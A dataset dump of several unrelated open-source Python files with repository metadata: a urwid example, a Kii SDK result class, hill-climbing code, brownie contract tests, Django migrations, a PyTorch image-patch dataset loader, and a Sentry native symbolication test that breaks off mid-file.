] | 1 | 2021-07-20T17:01:43.000Z | 2021-07-20T17:01:43.000Z | archive/examples/urwid_example.py | Tubular-Terriers/code-jam | be706c485110ee49727ec33d07b5d8fef7cf49e1 | [
"MIT"
] | null | null | null | archive/examples/urwid_example.py | Tubular-Terriers/code-jam | be706c485110ee49727ec33d07b5d8fef7cf49e1 | [
"MIT"
] | null | null | null | import urwid
txt = urwid.Text(u"Hello World")
fill = urwid.Filler(txt, "top")
loop = urwid.MainLoop(fill)
loop.run()
| 16.857143 | 32 | 0.70339 |
795ac9c116ca9f9fae65819b31ba4177868e8908 | 2,210 | py | Python | kii/results/object.py | ta2xeo/python3-kii | 892da42601318bcc15e70378614be76d68681881 | [
"MIT"
] | 2 | 2018-02-04T21:16:02.000Z | 2021-12-01T16:51:43.000Z | kii/results/object.py | ta2xeo/python3-kii | 892da42601318bcc15e70378614be76d68681881 | [
"MIT"
] | null | null | null | kii/results/object.py | ta2xeo/python3-kii | 892da42601318bcc15e70378614be76d68681881 | [
"MIT"
] | null | null | null | from datetime import datetime
from .base import BaseResult
class ObjectResult(BaseResult):
"""
for buckets result
"""
def set_result(self, result):
super().set_result(result)
return self
@property
def _created(self):
return datetime.fromtimestamp((self._result['_created']) / 1000)
@property
def _id(self):
return self._result['_id']
@property
def _modified(self):
return datetime.fromtimestamp((self._result['_modified']) / 1000)
@property
def _owner(self):
return self._result['_owner']
@property
def _version(self):
return int(self._result['_version'])
def refresh(self):
scope = self.request_helper.scope
new = scope.retrieve_an_object(self._id)
return self.set_result(new.json())
def partially_update(self, params, **kwargs):
scope = self.request_helper.scope
return scope.partially_update_an_object(self._id, params, **kwargs)
def retrieve_body(self, **kwargs):
scope = self.request_helper.scope
return scope.retrieve_an_object_body(self._id, **kwargs)
def add_or_replace_body(self, body, content_type):
scope = self.request_helper.scope
return scope.add_or_replace_an_object_body(self._id, body, content_type)
def verify_body(self):
scope = self.request_helper.scope
return scope.verify_the_object_body_existence(self._id)
def has_body(self):
scope = self.request_helper.scope
return scope.has_body(self._id)
def delete_body(self):
scope = self.request_helper.scope
return scope.delete_an_object_body(self._id)
def publish_body(self, *, expires_at=None, expires_in=None):
scope = self.request_helper.scope
return scope.publish_an_object_body(self._id,
expires_at=expires_at,
expires_in=expires_in)
def upload_body_multiple_pieces(self, body, content_type, piece_byte=1024 * 1024):
scope = self.request_helper.scope
return scope.upload_body_multiple_pieces(self._id, body, content_type, piece_byte)
| 30.694444 | 90 | 0.658371 |
795ac9eaea49d2291b599668a737ca47c0d326b4 | 780 | py | Python | Evolution/SinglePoint/ParallelHC.py | Evolutionary-Computing-2019/Angel-Corredor | 3218fe025ba6d3911bd4a1d782cbb97b5223eccc | [
"MIT"
] | 1 | 2019-09-11T04:28:40.000Z | 2019-09-11T04:28:40.000Z | Evolution/SinglePoint/ParallelHC.py | Evolutionary-Computing-2019/Angel-Corredor | 3218fe025ba6d3911bd4a1d782cbb97b5223eccc | [
"MIT"
] | null | null | null | Evolution/SinglePoint/ParallelHC.py | Evolutionary-Computing-2019/Angel-Corredor | 3218fe025ba6d3911bd4a1d782cbb97b5223eccc | [
"MIT"
] | null | null | null | from multiprocessing.pool import ThreadPool
from HillClimb import HillClimb
class ParallelHC:
def __init__(self, threads, dim, function, stop):
self.threads = threads
self.function = function
self.obj = HillClimb(dim, function, stop)
self.pool = ThreadPool(processes = threads)
def execute(self, _min = 0, _max = 1):
execution = [self.pool.apply_async(self.obj.execute, args=(_min, _max)) for i in range(self.threads)]
results = [res.get() for res in execution]
return ParallelHC.find_min(results, self.function)
@staticmethod
def find_min(results, function):
opt = results[0]
value = function(opt)
for res in results[1:]:
aux = function(res)
if aux < value:
opt = res
value = aux
return opt
| 28.888889 | 105 | 0.670513 |
795aca3bd791cdcef8635e8c9a29afeba89d6acb | 2,532 | py | Python | tests/test_bail.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | 55 | 2020-12-18T15:34:11.000Z | 2022-03-27T12:50:09.000Z | tests/test_bail.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | null | null | null | tests/test_bail.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | 17 | 2020-12-18T14:36:32.000Z | 2022-02-10T17:41:12.000Z | import brownie
def test_bail_seed_running(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
with brownie.reverts():
seed.bail({'from': agent})
with brownie.reverts():
seed.bail({'from': whale})
def test_bail_targets_met_expired(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
def test_bail_targets_not_met(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)//2
weth_amount = seed.target(1)*3//4
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount], {'from': whale})
with brownie.reverts():
seed.provide()
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before
def test_bail_targets_met_expired_multi_deposit(seed, lido, weth, agent, whale, chain):
lido_amount = seed.target(0)
weth_amount = seed.target(1)
lido_before = lido.balanceOf(agent)
weth_before = weth.balanceOf(whale)
lido.approve(seed, lido_amount)
seed.deposit([lido_amount//2, 0], {'from': agent})
seed.deposit([lido_amount//2, 0], {'from': agent})
weth.approve(seed, weth_amount)
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
seed.deposit([0, weth_amount//4], {'from': whale})
chain.sleep(14 * 86400)
seed.bail({'from': agent})
assert lido.balanceOf(agent) == lido_before
seed.bail({'from': whale})
assert weth.balanceOf(whale) == weth_before | 29.44186 | 87 | 0.657583 |
795acb265ffee626a9d0657f85b7bed07e9700dc | 429 | py | Python | src/volunteers/migrations/0012_auto_20161106_2058.py | mrts/foodbank-campaign | fbb059f3ebe44dccde4895964242b105421a69d1 | [
"MIT"
] | 1 | 2021-03-20T10:14:21.000Z | 2021-03-20T10:14:21.000Z | src/volunteers/migrations/0012_auto_20161106_2058.py | mrts/foodbank-campaign | fbb059f3ebe44dccde4895964242b105421a69d1 | [
"MIT"
] | 4 | 2018-03-24T21:49:02.000Z | 2021-01-13T21:31:44.000Z | src/volunteers/migrations/0012_auto_20161106_2058.py | mrts/foodbank-campaign | fbb059f3ebe44dccde4895964242b105421a69d1 | [
"MIT"
] | 3 | 2018-04-15T16:34:46.000Z | 2019-11-13T16:38:05.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-06 18:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('volunteers', '0011_volunteer_notes'),
]
operations = [
migrations.AlterIndexTogether(
name='volunteer',
index_together=set([('email', 'group_name')]),
),
]
| 21.45 | 58 | 0.622378 |
795acb3ad57b8f5f0ae38c9001fc6efc6c99c71d | 8,827 | py | Python | backbone/CustomDataset.py | LudovicoL/PaDiM | d60da5218eeed01e6b7f1e386389446b4ebb2300 | [
"Apache-2.0"
] | null | null | null | backbone/CustomDataset.py | LudovicoL/PaDiM | d60da5218eeed01e6b7f1e386389446b4ebb2300 | [
"Apache-2.0"
] | null | null | null | backbone/CustomDataset.py | LudovicoL/PaDiM | d60da5218eeed01e6b7f1e386389446b4ebb2300 | [
"Apache-2.0"
] | null | null | null | import os
from PIL import Image
from scipy.ndimage.filters import gaussian_filter
import cv2
import shutil # To copy the file
import sys
import numpy as np
import torch
from torchvision import transforms
from torch.utils.data import Dataset
import torch.nn.functional as F
import torchvision
import backbone as bb
customdataset_folder = './datasets/CustomDataset/'
customdataset_train_dir = customdataset_folder + 'trainset/'
customdataset_test_dir = customdataset_folder + 'testset/'
customdataset_mask_dir = customdataset_folder + 'Mask_images/'
customdataset_config_file = customdataset_folder + 'config'
CUSTOMDATASET_CLASS_NAMES = ['00', '01', '02', '03', '04', '05', '06', '07', '08', '09', '10']
PATCH_SIZE = 256 # patch size
STRIDE = PATCH_SIZE # stride of patch
ANOMALY_THRESHOLD = 0
class CustomDataset(Dataset):
def __init__(self, class_name='CustomDataset', resize=256, cropsize=224, is_train=True):
self.is_train = is_train
self.class_name = class_name
self.resize = resize
self.cropsize = cropsize
self.transform = transforms.Compose([transforms.Resize(resize, Image.ANTIALIAS),
transforms.CenterCrop(cropsize),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])])
self.transform_mask = transforms.Compose([transforms.Resize(resize, Image.NEAREST),
transforms.CenterCrop(cropsize),
transforms.ToTensor()])
self.main_dir = customdataset_train_dir+self.class_name+'/' if self.is_train else customdataset_test_dir+self.class_name+'/'
self.all_imgs = sorted(os.listdir(self.main_dir))
self.mask_dir = customdataset_mask_dir
if not self.is_train:
self.all_mask = sorted(os.listdir(self.mask_dir))
def __len__(self):
return len(self.all_imgs)
def __getitem__(self, idx):
img_loc = os.path.join(self.main_dir, self.all_imgs[idx])
image = Image.open(img_loc).convert('RGB')
tensor_image = self.transform(image) # x in mvtec class
mask_name = self.all_imgs[idx].replace('.png', '_mask.png')
if os.path.isfile(self.mask_dir + mask_name):
mask_loc = os.path.join(self.mask_dir, mask_name)
mask = Image.open(mask_loc).convert('L')
tensor_mask = self.transform_mask(mask) # mask in mvtec class
else:
tensor_mask = torch.zeros([1, self.cropsize, self.cropsize])
if int(torch.sum(tensor_mask)) > ANOMALY_THRESHOLD: # y in mvtec class
defective = 1
else:
defective = 0
return tensor_image, defective, tensor_mask
def getName(self, idx, mask=False):
if mask:
return self.all_imgs[idx].replace('.png', '_mask.png')
else:
return self.all_imgs[idx]
def resizeCustomDataset(img):
if img.shape[2] % PATCH_SIZE != 0: # width
patches_in_image = int(np.floor(img.shape[2] / PATCH_SIZE))
new_width = img.shape[2] - (img.shape[2] - (patches_in_image * PATCH_SIZE))
else:
new_width = img.shape[2]
if img.shape[1] % PATCH_SIZE != 0: # height
patches_in_image = int(np.floor(img.shape[1] / PATCH_SIZE))
new_height = img.shape[1] - (img.shape[1] - (patches_in_image * PATCH_SIZE))
else:
new_height = img.shape[1]
transform = transforms.CenterCrop((new_height, new_width))
crop_img = transform(img)
return crop_img, new_width, new_height
# --------------- Functions for patches ---------------
def DivideInPatches(img, size, stride):
p = img.unfold(1, size, stride).unfold(2, size, stride)
patches = p.contiguous().view(p.size(0), -1, size, size).permute(1,0,2,3)
return patches
# --------------- Functions to create Custom Dataset ---------------
def DeleteFolder(path):
shutil.rmtree(path)
def BinarizeMasks(Mask_path):
thresh = 128
maxval = 255
all_imgs = sorted(os.listdir(Mask_path))
for i in all_imgs:
im_gray = np.array(Image.open(Mask_path+i).convert('L'))
im_bin = (im_gray > thresh) * maxval
Image.fromarray(np.uint8(im_bin)).save(Mask_path+i)
def RenameFolder(oldname, newname):
os.rename(oldname, newname)
def CreateCustomDataset(log_file):
try:
BinarizeMasks(customdataset_mask_dir)
train_folder_temp = customdataset_folder + 'trainset_temp/'
test_folder_temp = customdataset_folder + 'testset_temp/'
Mask_path_temp = customdataset_folder + 'Mask_images_temp/'
RenameFolder(customdataset_train_dir, train_folder_temp)
RenameFolder(customdataset_test_dir, test_folder_temp)
RenameFolder(customdataset_mask_dir, Mask_path_temp)
os.makedirs(customdataset_train_dir, exist_ok=True)
os.makedirs(customdataset_test_dir, exist_ok=True)
os.makedirs(customdataset_mask_dir, exist_ok=True)
for Class in CUSTOMDATASET_CLASS_NAMES:
os.makedirs(customdataset_train_dir+Class+'/', exist_ok=True)
os.makedirs(customdataset_test_dir+Class+'/', exist_ok=True)
transform = transforms.Compose([
transforms.ToTensor()
])
for Class in CUSTOMDATASET_CLASS_NAMES:
train_temp = train_folder_temp+Class+'/'
test_temp = test_folder_temp+Class+'/'
all_train_imgs = sorted(os.listdir(train_temp))
for img in all_train_imgs:
img_loc = os.path.join(train_temp, img)
image = Image.open(img_loc).convert('RGB')
tensor_image = transform(image)
tensor_image, _, _ = resizeCustomDataset(tensor_image)
train_patches = DivideInPatches(tensor_image, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(train_patches):
name = img.replace('.png', '_'+str(idx)+'.png')
name = os.path.join(customdataset_train_dir+Class+'/', name)
torchvision.utils.save_image(patch, name)
all_test_imgs = sorted(os.listdir(test_temp))
for img in all_test_imgs:
img_loc = os.path.join(test_temp, img)
image = Image.open(img_loc).convert('RGB')
tensor_image = transform(image)
tensor_image, new_width, new_height = resizeCustomDataset(tensor_image)
test_patches = DivideInPatches(tensor_image, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(test_patches):
name = img.replace('.png', '_'+str(idx)+'.png')
name = os.path.join(customdataset_test_dir+Class+'/', name)
torchvision.utils.save_image(patch, name)
mask_name = img.replace('.png', '_mask.png')
if os.path.isfile(Mask_path_temp + mask_name):
mask_loc = os.path.join(Mask_path_temp, mask_name)
mask = Image.open(mask_loc).convert('L')
tensor_mask = transform(mask)
else:
tensor_mask = torch.zeros([1, new_height, new_width])
transform_mask = transforms.CenterCrop((new_height, new_width))
tensor_mask = transform_mask(tensor_mask)
test_masks = DivideInPatches(tensor_mask, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(test_masks):
name = mask_name.replace('_mask.png', '_'+str(idx)+'_mask.png')
name = os.path.join(customdataset_mask_dir, name)
torchvision.utils.save_image(patch, name)
DeleteFolder(train_folder_temp)
DeleteFolder(test_folder_temp)
DeleteFolder(Mask_path_temp)
f = open(customdataset_config_file, "a")
f.write("This file indicates that the dataset is ready to be used. Don't delete it!")
f.close()
except:
bb.myPrint("Error in CreateCustomDataset function!", log_file)
DeleteFolder(customdataset_folder)
sys.exit(-1)
def prepareCustomDataset(log_file):
if os.path.isdir(customdataset_folder):
if (os.path.exists(customdataset_config_file)):
return
else:
bb.myPrint("Preparing the Custom Dataset...", log_file)
CreateCustomDataset(log_file)
else:
bb.myPrint('ERROR: Custom Dataset not found!', log_file)
sys.exit(-1)
| 43.915423 | 132 | 0.612213 |
795accf8a97e01f90b58b90e6f09f53e85384774 | 1,263 | py | Python | mall/apps/oauth/migrations/0002_oauthsinauser.py | xxbsg/meiduo | 0e82628833c4b482884cd392b8d22cb8558f1ffd | [
"MIT"
] | null | null | null | mall/apps/oauth/migrations/0002_oauthsinauser.py | xxbsg/meiduo | 0e82628833c4b482884cd392b8d22cb8558f1ffd | [
"MIT"
] | null | null | null | mall/apps/oauth/migrations/0002_oauthsinauser.py | xxbsg/meiduo | 0e82628833c4b482884cd392b8d22cb8558f1ffd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-01-25 02:45
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('oauth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='OAuthSinaUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('access_token', models.CharField(db_index=True, max_length=64, verbose_name='access_token')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='用户')),
],
options={
'db_table': 'tb_oauth_sina',
'verbose_name_plural': 'sina登录用户数据',
'verbose_name': 'sina登录用户数据',
},
),
]
| 37.147059 | 137 | 0.623911 |
795acd4e08d70195880d410c45a55289d7ec3faa | 44,335 | py | Python | tests/sentry/lang/native/test_plugin.py | Munyola/sentry | ab8923b2801d7d72d6903e0d9180584817bb1b9a | [
"BSD-3-Clause"
] | 1 | 2017-10-18T19:40:14.000Z | 2017-10-18T19:40:14.000Z | tests/sentry/lang/native/test_plugin.py | Munyola/sentry | ab8923b2801d7d72d6903e0d9180584817bb1b9a | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/lang/native/test_plugin.py | Munyola/sentry | ab8923b2801d7d72d6903e0d9180584817bb1b9a | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
import os
import zipfile
from mock import patch
from six import BytesIO
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from sentry.models import Event
from sentry.testutils import TestCase
from sentry.lang.native.symbolizer import Symbolizer
from symbolic import parse_addr
class BasicResolvingIntegrationTest(TestCase):
@patch('sentry.lang.native.symbolizer.Symbolizer._symbolize_app_frame')
def test_frame_resolution(self, symbolize_frame):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
symbolize_frame.return_value = [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 42,
'colno': 23,
'package': object_name,
'function': 'real_main',
'symbol_addr': '0x1000262a0',
"instruction_addr": '0x100026330',
}]
event_data = {
"sentry.interfaces.User": {
"ip_address": "31.172.207.97"
},
"extra": {},
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [
{
"type": "apple",
"cpu_subtype": 0,
"uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
"image_vmaddr": 4294967296,
"image_addr": 4295098368,
"cpu_type": 16777228,
"image_size": 32768,
"name": object_name,
}
],
"sdk_info": {
"dsym_type": "macho",
"sdk_name": "iOS",
"version_major": 9,
"version_minor": 3,
"version_patchlevel": 0
}
},
"sentry.interfaces.Exception": {
"values": [
{
'stacktrace': {
"frames": [
{
"function": "<redacted>",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": "0x002ac28b8"
},
{
"function": "main",
"instruction_addr": 4295123760
},
{
"platform": "javascript",
"function": "merge",
"abs_path": "/scripts/views.js",
"vars": {},
"module": None,
"filename": "../../sentry/scripts/views.js",
"colno": 16,
"in_app": True,
"lineno": 268
}
]
},
"type": "NSRangeException",
"mechanism": {
"posix_signal": {
"signal": 6,
"code": 0,
"name": "SIGABRT",
"code_name": None
},
"type": "cocoa",
"mach_exception": {
"subcode": 0,
"code": 0,
"exception": 10,
"exception_name": "EXC_CRASH"
}
},
"value": (
"*** -[__NSArray0 objectAtIndex:]: index 3 "
"beyond bounds for empty NSArray"
)
}
]
},
"contexts": {
"device": {
"model_id": "N102AP",
"model": "iPod7,1",
"arch": "arm64",
"family": "iPod"
},
"os": {
"version": "9.3.2",
"rooted": False,
"build": "13F69",
"name": "iOS"
}
},
"threads": {
"values": [
{
"id": 39,
'stacktrace': {
"frames": [
{
"platform": "apple",
"package": "\/usr\/lib\/system\/libsystem_pthread.dylib",
"symbol_addr": "0x00000001843a102c",
"image_addr": "0x00000001843a0000",
"instruction_addr": "0x00000001843a1530"
},
{
"platform": "apple",
"package": "\/usr\/lib\/system\/libsystem_kernel.dylib",
"symbol_addr": "0x00000001842d8b40",
"image_addr": "0x00000001842bc000",
"instruction_addr": "0x00000001842d8b48"
}
]
},
"crashed": False,
"current": False
}
]
}
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert frames[0].function == '<redacted>'
assert frames[0].instruction_addr == '0x2ac28b8'
assert not frames[0].in_app
assert frames[1].function == 'real_main'
assert frames[1].filename == 'Foo.swift'
assert frames[1].lineno == 42
assert frames[1].colno == 23
assert frames[1].package == object_name
assert frames[1].instruction_addr == '0x100026330'
assert frames[1].in_app
assert frames[2].platform == 'javascript'
assert frames[2].abs_path == '/scripts/views.js'
assert frames[2].function == 'merge'
assert frames[2].lineno == 268
assert frames[2].colno == 16
assert frames[2].filename == '../../sentry/scripts/views.js'
assert frames[2].in_app
assert len(event.interfaces['threads'].values) == 1
def sym_app_frame(self, instruction_addr, img, sdk_info=None):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
if not (4295098384 <= parse_addr(instruction_addr) < 4295098388):
return [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 82,
'colno': 23,
'package': object_name,
'function': 'other_main',
'symbol_addr': '0x1',
"instruction_addr": '0x1',
}]
return [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 42,
'colno': 23,
'package': object_name,
'function': 'real_main',
'symbol_addr': '0x1000262a0',
"instruction_addr": '0x100026330',
}]
@patch.object(Symbolizer, '_symbolize_app_frame', sym_app_frame)
def test_frame_resolution_no_sdk_info(self):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
event_data = {
"sentry.interfaces.User": {
"ip_address": "31.172.207.97"
},
"extra": {},
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [
{
"type": "apple",
"cpu_subtype": 0,
"uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
"image_vmaddr": 4294967296,
"image_addr": 4295098368,
"cpu_type": 16777228,
"image_size": 32768,
"name": object_name,
}
]
},
"contexts": {
"os": {
"name": "iOS",
"version": "9.3.0"
}
},
"sentry.interfaces.Exception": {
"values": [
{
"stacktrace": {
"frames": [
{
"function": "<redacted>",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": "0x002ac28b8"
},
{
"function": "main",
"instruction_addr": 4295098388,
},
{
"function": "other_main",
"instruction_addr": 4295098396
},
{
"platform": "javascript",
"function": "merge",
"abs_path": "/scripts/views.js",
"vars": {},
"module": None,
"filename": "../../sentry/scripts/views.js",
"colno": 16,
"in_app": True,
"lineno": 268
}
]
},
"type": "NSRangeException",
"mechanism": {
"posix_signal": {
"signal": 6,
"code": 0,
"name": "SIGABRT",
"code_name": None
},
"type": "cocoa",
"mach_exception": {
"subcode": 0,
"code": 0,
"exception": 10,
"exception_name": "EXC_CRASH"
}
},
"value": (
"*** -[__NSArray0 objectAtIndex:]: index 3 "
"beyond bounds for empty NSArray"
)
}
]
},
"contexts": {
"device": {
"model_id": "N102AP",
"model": "iPod7,1",
"arch": "arm64",
"family": "iPod"
},
"os": {
"version": "9.3.2",
"rooted": False,
"build": "13F69",
"name": "iOS"
}
}
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert frames[0].function == '<redacted>'
assert frames[0].instruction_addr == '0x2ac28b8'
assert not frames[0].in_app
assert frames[1].function == 'real_main'
assert frames[1].filename == 'Foo.swift'
assert frames[1].lineno == 42
assert frames[1].colno == 23
assert frames[1].package == object_name
assert frames[1].instruction_addr == '0x100020014'
assert frames[1].in_app
assert frames[2].function == 'other_main'
assert frames[2].filename == 'Foo.swift'
assert frames[2].lineno == 82
assert frames[2].colno == 23
assert frames[2].package == object_name
assert frames[2].instruction_addr == '0x10002001c'
assert frames[2].in_app
assert frames[3].platform == 'javascript'
assert frames[3].abs_path == '/scripts/views.js'
assert frames[3].function == 'merge'
assert frames[3].lineno == 268
assert frames[3].colno == 16
assert frames[3].filename == '../../sentry/scripts/views.js'
assert frames[3].in_app
x = bt.get_api_context()
long_frames = x['frames']
assert long_frames[0]['instructionAddr'] == '0x002ac28b8'
assert long_frames[1]['instructionAddr'] == '0x100020014'
assert long_frames[2]['instructionAddr'] == '0x10002001c'
class InAppHonoringResolvingIntegrationTest(TestCase):
@patch('sentry.lang.native.symbolizer.Symbolizer._symbolize_app_frame')
def test_frame_resolution(self, symbolize_frame):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
symbolize_frame.return_value = [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 42,
'colno': 23,
'package': object_name,
'function': 'real_main',
'symbol_addr': '0x1000262a0',
"instruction_addr": '0x100026330',
}]
event_data = {
"sentry.interfaces.User": {
"ip_address": "31.172.207.97"
},
"extra": {},
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [
{
"type": "apple",
"cpu_subtype": 0,
"uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
"image_vmaddr": 4294967296,
"image_addr": 4295098368,
"cpu_type": 16777228,
"image_size": 32768,
"name": object_name,
}
],
"sdk_info": {
"dsym_type": "macho",
"sdk_name": "iOS",
"version_major": 9,
"version_minor": 3,
"version_patchlevel": 0
}
},
"sentry.interfaces.Exception": {
"values": [
{
'stacktrace': {
"frames": [
{
"function": "<redacted>",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": "0x002ac28b8",
"in_app": True,
},
{
"function": "main",
"instruction_addr": 4295123760,
"in_app": False,
},
{
"platform": "javascript",
"function": "merge",
"abs_path": "/scripts/views.js",
"vars": {},
"module": None,
"filename": "../../sentry/scripts/views.js",
"colno": 16,
"in_app": True,
"lineno": 268
}
]
},
"type": "NSRangeException",
"mechanism": {
"posix_signal": {
"signal": 6,
"code": 0,
"name": "SIGABRT",
"code_name": None
},
"type": "cocoa",
"mach_exception": {
"subcode": 0,
"code": 0,
"exception": 10,
"exception_name": "EXC_CRASH"
}
},
"value": (
"*** -[__NSArray0 objectAtIndex:]: index 3 "
"beyond bounds for empty NSArray"
)
}
]
},
"contexts": {
"device": {
"model_id": "N102AP",
"model": "iPod7,1",
"arch": "arm64",
"family": "iPod"
},
"os": {
"version": "9.3.2",
"rooted": False,
"build": "13F69",
"name": "iOS"
}
},
"threads": {
"values": [
{
"id": 39,
'stacktrace': {
"frames": [
{
"platform": "apple",
"package": "\/usr\/lib\/system\/libsystem_pthread.dylib",
"symbol_addr": "0x00000001843a102c",
"image_addr": "0x00000001843a0000",
"instruction_addr": "0x00000001843a1530"
},
{
"platform": "apple",
"package": "\/usr\/lib\/system\/libsystem_kernel.dylib",
"symbol_addr": "0x00000001842d8b40",
"image_addr": "0x00000001842bc000",
"instruction_addr": "0x00000001842d8b48"
}
]
},
"crashed": False,
"current": False
}
]
}
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert frames[0].function == '<redacted>'
assert frames[0].instruction_addr == '0x2ac28b8'
assert frames[0].in_app
assert frames[1].function == 'real_main'
assert frames[1].filename == 'Foo.swift'
assert frames[1].lineno == 42
assert frames[1].colno == 23
assert frames[1].package == object_name
assert frames[1].instruction_addr == '0x100026330'
assert not frames[1].in_app
assert frames[2].platform == 'javascript'
assert frames[2].abs_path == '/scripts/views.js'
assert frames[2].function == 'merge'
assert frames[2].lineno == 268
assert frames[2].colno == 16
assert frames[2].filename == '../../sentry/scripts/views.js'
assert frames[2].in_app
assert len(event.interfaces['threads'].values) == 1
def sym_app_frame(self, instruction_addr, img, sdk_info=None):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
if not (4295098384 <= parse_addr(instruction_addr) < 4295098388):
return [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 82,
'colno': 23,
'package': object_name,
'function': 'other_main',
'symbol_addr': '0x1',
"instruction_addr": '0x1',
}]
return [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 42,
'colno': 23,
'package': object_name,
'function': 'real_main',
'symbol_addr': '0x1000262a0',
"instruction_addr": '0x100026330',
}]
@patch.object(Symbolizer, '_symbolize_app_frame', sym_app_frame)
def test_frame_resolution_no_sdk_info(self):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
event_data = {
"sentry.interfaces.User": {
"ip_address": "31.172.207.97"
},
"extra": {},
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [
{
"type": "apple",
"cpu_subtype": 0,
"uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
"image_vmaddr": 4294967296,
"image_addr": 4295098368,
"cpu_type": 16777228,
"image_size": 32768,
"name": object_name,
}
]
},
"contexts": {
"os": {
"name": "iOS",
"version": "9.3.0"
}
},
"sentry.interfaces.Exception": {
"values": [
{
"stacktrace": {
"frames": [
{
"function": "<redacted>",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": "0x002ac28b8"
},
{
"function": "main",
"instruction_addr": 4295098388,
},
{
"function": "other_main",
"instruction_addr": 4295098396
},
{
"platform": "javascript",
"function": "merge",
